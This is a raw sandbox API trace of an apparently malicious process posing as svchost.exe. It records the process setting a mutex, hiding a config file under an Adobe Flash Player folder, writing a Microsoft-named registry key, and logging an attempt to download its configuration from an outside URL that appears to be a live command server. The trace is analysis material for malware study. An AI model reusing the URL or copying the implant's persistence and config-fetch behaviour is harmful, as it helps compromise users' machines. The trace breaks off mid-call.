[0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="B7") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="49") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="67") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="98") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="F6") returned 2 [0120.313] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="14") returned 2 [0120.314] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="59") returned 2 [0120.314] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="35") returned 2 [0120.314] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="AA") returned 2 [0120.314] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="3E") returned 2 [0120.314] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="27") returned 2 [0120.314] wvnsprintfW (in: pszDest=0x725dea8, cchDest=6, pszFmt="%02X", arglist=0x725de84 | out: pszDest="60") returned 2 [0120.314] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1b0 [0120.314] WaitForSingleObject (hHandle=0x1b0, dwMilliseconds=0xffffffff) returned 0x0 [0120.467] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.467] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.467] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.467] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.467] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.468] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.468] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.468] GetCurrentThread () returned 0xfffffffe [0120.468] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e10c | out: TokenHandle=0x725e10c*=0x0) returned 0 [0120.468] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e10c | out: TokenHandle=0x725e10c*=0x1e4) returned 1 [0120.468] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e114 | out: lpLuid=0x725e114*(LowPart=0x8, HighPart=0)) returned 1 [0120.469] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x725e110*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.469] GetLastError () returned 0x0 [0120.469] CloseHandle (hObject=0x1e4) returned 1 [0120.470] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.470] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214040, lpbSaclPresent=0x725e144, pSacl=0x725e138, lpbSaclDefaulted=0x725e140 | out: lpbSaclPresent=0x725e144, pSacl=0x725e138, lpbSaclDefaulted=0x725e140) returned 1 [0120.470] SetNamedSecurityInfoW () returned 0x0 [0120.477] LocalFree (hMem=0x5214040) returned 0x0 [0120.478] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.478] GetCurrentThread () returned 0xfffffffe [0120.478] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e10c | out: TokenHandle=0x725e10c*=0x0) returned 0 [0120.478] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e10c | out: TokenHandle=0x725e10c*=0x1e4) returned 1 [0120.478] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e114 | out: lpLuid=0x725e114*(LowPart=0x8, HighPart=0)) returned 1 [0120.479] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x725e110*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.479] GetLastError () returned 0x0 [0120.479] CloseHandle (hObject=0x1e4) returned 1 [0120.479] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.480] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x725e144, pSacl=0x725e138, lpbSaclDefaulted=0x725e140 | out: lpbSaclPresent=0x725e144, pSacl=0x725e138, lpbSaclDefaulted=0x725e140) returned 1 [0120.480] SetNamedSecurityInfoW () returned 0x0 [0120.481] LocalFree (hMem=0x52142e0) returned 0x0 [0120.481] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0120.482] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x725e158 | out: lpFileSize=0x725e158*=2967) returned 1 [0120.482] VirtualAlloc (lpAddress=0x0, dwSize=0xb97, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0xb97, lpNumberOfBytesRead=0x725e164, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x725e164*=0xb97, lpOverlapped=0x0) returned 1 [0120.488] CloseHandle (hObject=0x1e4) returned 1 [0120.488] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366141") returned 10 [0120.489] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366141") returned 10 [0120.490] wvnsprintfA (in: pszDest=0x5413bc8, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366142") returned 10 [0120.491] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366142") returned 10 [0120.492] wvnsprintfA (in: pszDest=0x5413aa8, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366147") returned 10 [0120.493] wvnsprintfA (in: pszDest=0x5413a48, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366147") returned 10 [0120.494] wvnsprintfA (in: pszDest=0x5413ba8, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366202") returned 10 [0120.495] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366202") returned 10 [0120.496] wvnsprintfA (in: pszDest=0x5413aa8, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366202") returned 10 [0120.497] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x725e0a8 | out: pszDest="1476366202") returned 10 [0120.506] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0120.508] WriteFile (in: hFile=0x1e4, lpBuffer=0x54035e8*, nNumberOfBytesToWrite=0xc99, lpNumberOfBytesWritten=0x725e15c, lpOverlapped=0x0 | out: lpBuffer=0x54035e8*, lpNumberOfBytesWritten=0x725e15c, lpOverlapped=0x0) returned 1 [0120.509] CloseHandle (hObject=0x1e4) returned 1 [0120.516] ReleaseMutex (hMutex=0x1b0) returned 1 [0120.545] CloseHandle (hObject=0x1b0) returned 1 [0120.545] SetLastError (dwErrCode=0x0) [0120.546] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x725e22c, lpdwDisposition=0x0 | out: phkResult=0x725e22c*=0x1b0, lpdwDisposition=0x0) returned 0x0 [0120.546] RegSetValueExW (in: hKey=0x1b0, lpValueName="Vipoug", Reserved=0x0, dwType=0x3, lpData=0x5403af0*, cbData=0x220 | out: lpData=0x5403af0*) returned 0x0 [0120.546] RegCloseKey (hKey=0x1b0) returned 0x0 [0120.547] ReleaseMutex (hMutex=0x19c) returned 1 [0120.547] CloseHandle (hObject=0x19c) returned 1 [0120.547] GetLastError () returned 0x0 [0120.547] GetLocalTime (in: lpSystemTime=0x725ecb8 | out: lpSystemTime=0x725ecb8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x3c8)) [0120.547] GetCurrentThreadId () returned 0xd6c [0120.547] GetCurrentProcessId () returned 0x2ec [0120.547] wvnsprintfW (in: pszDest=0x54010a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725ec5c | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0120.547] wvnsprintfW (in: pszDest=0x540114c, cchDest=1962, pszFmt="Trying download config \"%S\".", arglist=0x725ecdc | out: pszDest="Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".") returned 87 [0120.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".", cchWideChar=173, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 173 [0120.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".", cchWideChar=173, lpMultiByteStr=0x5404f40, cbMultiByte=174, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".", lpUsedDefaultChar=0x0) returned 173 [0120.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".", cchWideChar=173, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 173 [0120.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".", cchWideChar=173, lpMultiByteStr=0x54036e8, cbMultiByte=174, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x000B, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Trying download config \"https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat\".", lpUsedDefaultChar=0x0) returned 173 [0120.548] GetSystemTime (in: lpSystemTime=0x725e8a8 | out: lpSystemTime=0x725e8a8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x3c8)) [0120.549] SystemTimeToFileTime (in: lpSystemTime=0x725e8a8, lpFileTime=0x725e898 | out: lpFileTime=0x725e898) returned 1 [0120.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.549] GetUserNameExW () returned 0x1 [0120.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413a48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.550] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="8A") returned 2 [0120.550] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="00") returned 2 [0120.551] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="00") returned 2 [0120.551] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="00") returned 2 [0120.551] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="B7") returned 2 [0120.551] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="49") returned 2 [0120.551] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="67") returned 2 [0120.551] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="98") returned 2 [0120.552] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="F6") returned 2 [0120.558] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="14") returned 2 [0120.558] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="59") returned 2 [0120.558] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="35") returned 2 [0120.558] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="AA") returned 2 [0120.563] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="3E") returned 2 [0120.563] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="27") returned 2 [0120.563] wvnsprintfW (in: pszDest=0x725e690, cchDest=6, pszFmt="%02X", arglist=0x725e66c | out: pszDest="60") returned 2 [0120.564] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x19c [0120.564] WaitForSingleObject (hHandle=0x19c, dwMilliseconds=0xffffffff) returned 0x0 [0120.729] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.729] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.730] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.730] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.730] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.730] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.730] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.731] GetCurrentThread () returned 0xfffffffe [0120.731] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e8f4 | out: TokenHandle=0x725e8f4*=0x0) returned 0 [0120.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e8f4 | out: TokenHandle=0x725e8f4*=0x1b0) returned 1 [0120.731] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e8fc | out: lpLuid=0x725e8fc*(LowPart=0x8, HighPart=0)) returned 1 [0120.733] AdjustTokenPrivileges (in: TokenHandle=0x1b0, DisableAllPrivileges=0, NewState=0x725e8f8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.733] GetLastError () returned 0x0 [0120.733] CloseHandle (hObject=0x1b0) returned 1 [0120.733] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.733] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214310, lpbSaclPresent=0x725e92c, pSacl=0x725e920, lpbSaclDefaulted=0x725e928 | out: lpbSaclPresent=0x725e92c, pSacl=0x725e920, lpbSaclDefaulted=0x725e928) returned 1 [0120.733] SetNamedSecurityInfoW () returned 0x0 [0120.745] LocalFree (hMem=0x5214310) returned 0x0 [0120.745] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0xffffffff [0120.745] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0120.746] wvnsprintfA (in: pszDest=0x5413048, cchDest=21, pszFmt="%d", arglist=0x725e890 | out: pszDest="1476366202") returned 10 [0120.747] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0120.748] WriteFile (in: hFile=0x1b0, lpBuffer=0x54034e8*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x725e944, lpOverlapped=0x0 | out: lpBuffer=0x54034e8*, lpNumberOfBytesWritten=0x725e944, lpOverlapped=0x0) returned 1 [0120.749] CloseHandle (hObject=0x1b0) returned 1 [0120.751] ReleaseMutex (hMutex=0x19c) returned 1 [0120.774] CloseHandle (hObject=0x19c) returned 1 [0120.775] SetLastError (dwErrCode=0x0) [0120.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x725e744 | out: phkResult=0x725e744*=0x19c) returned 0x0 [0120.775] RegQueryValueExW (in: hKey=0x19c, lpValueName="Vipoug", lpReserved=0x0, lpType=0x725e76c, lpData=0x0, lpcbData=0x725e754*=0x0 | out: lpType=0x725e76c*=0x3, lpData=0x0, lpcbData=0x725e754*=0x220) returned 0x0 [0120.775] RegQueryValueExW (in: hKey=0x19c, lpValueName="Vipoug", lpReserved=0x0, lpType=0x725e76c, lpData=0x54010a0, lpcbData=0x725e754*=0x220 | out: lpType=0x725e76c*=0x3, lpData=0x54010a0*, lpcbData=0x725e754*=0x220) returned 0x0 [0120.775] RegCloseKey (hKey=0x19c) returned 0x0 [0120.776] InternetCrackUrlA (in: lpszUrl="https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x725ebf0 | out: lpUrlComponents=0x725ebf0) returned 1 [0120.913] GetSystemTime (in: lpSystemTime=0x725e860 | out: lpSystemTime=0x725e860*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x148)) [0120.913] SystemTimeToFileTime (in: lpSystemTime=0x725e860, lpFileTime=0x725e850 | out: lpFileTime=0x725e850) returned 1 [0120.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412228, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.913] GetUserNameExW () returned 0x1 [0120.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413368, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1A6A029FD42BE6F0E553D52A8FFBC071", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0120.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1A6A029FD42BE6F0E553D52A8FFBC071", cchWideChar=32, lpMultiByteStr=0x54020f0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1A6A029FD42BE6F0E553D52A8FFBC071", lpUsedDefaultChar=0x0) returned 32 [0120.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x725e7c4 | out: phkResult=0x725e7c4*=0x1f8) returned 0x0 [0120.916] RegQueryValueExW (in: hKey=0x1f8, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x725e7f0, lpData=0x0, lpcbData=0x725e7d4*=0x0 | out: lpType=0x725e7f0*=0x0, lpData=0x0, lpcbData=0x725e7d4*=0x0) returned 0x2 [0120.916] RegCloseKey (hKey=0x1f8) returned 0x0 [0120.916] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0120.916] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x725e7c8 | out: lpFileSize=0x725e7c8*=0) returned 1 [0120.916] CloseHandle (hObject=0x1f8) returned 1 [0120.916] GetLastError () returned 0x0 [0120.916] GetLastError () returned 0x0 [0120.916] GetLocalTime (in: lpSystemTime=0x725e7d8 | out: lpSystemTime=0x725e7d8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x148)) [0120.917] GetCurrentThreadId () returned 0xd6c [0120.917] GetCurrentProcessId () returned 0x2ec [0120.917] wvnsprintfW (in: pszDest=0x54032a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725e77c | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0120.917] wvnsprintfW (in: pszDest=0x540334c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x725e7f8 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 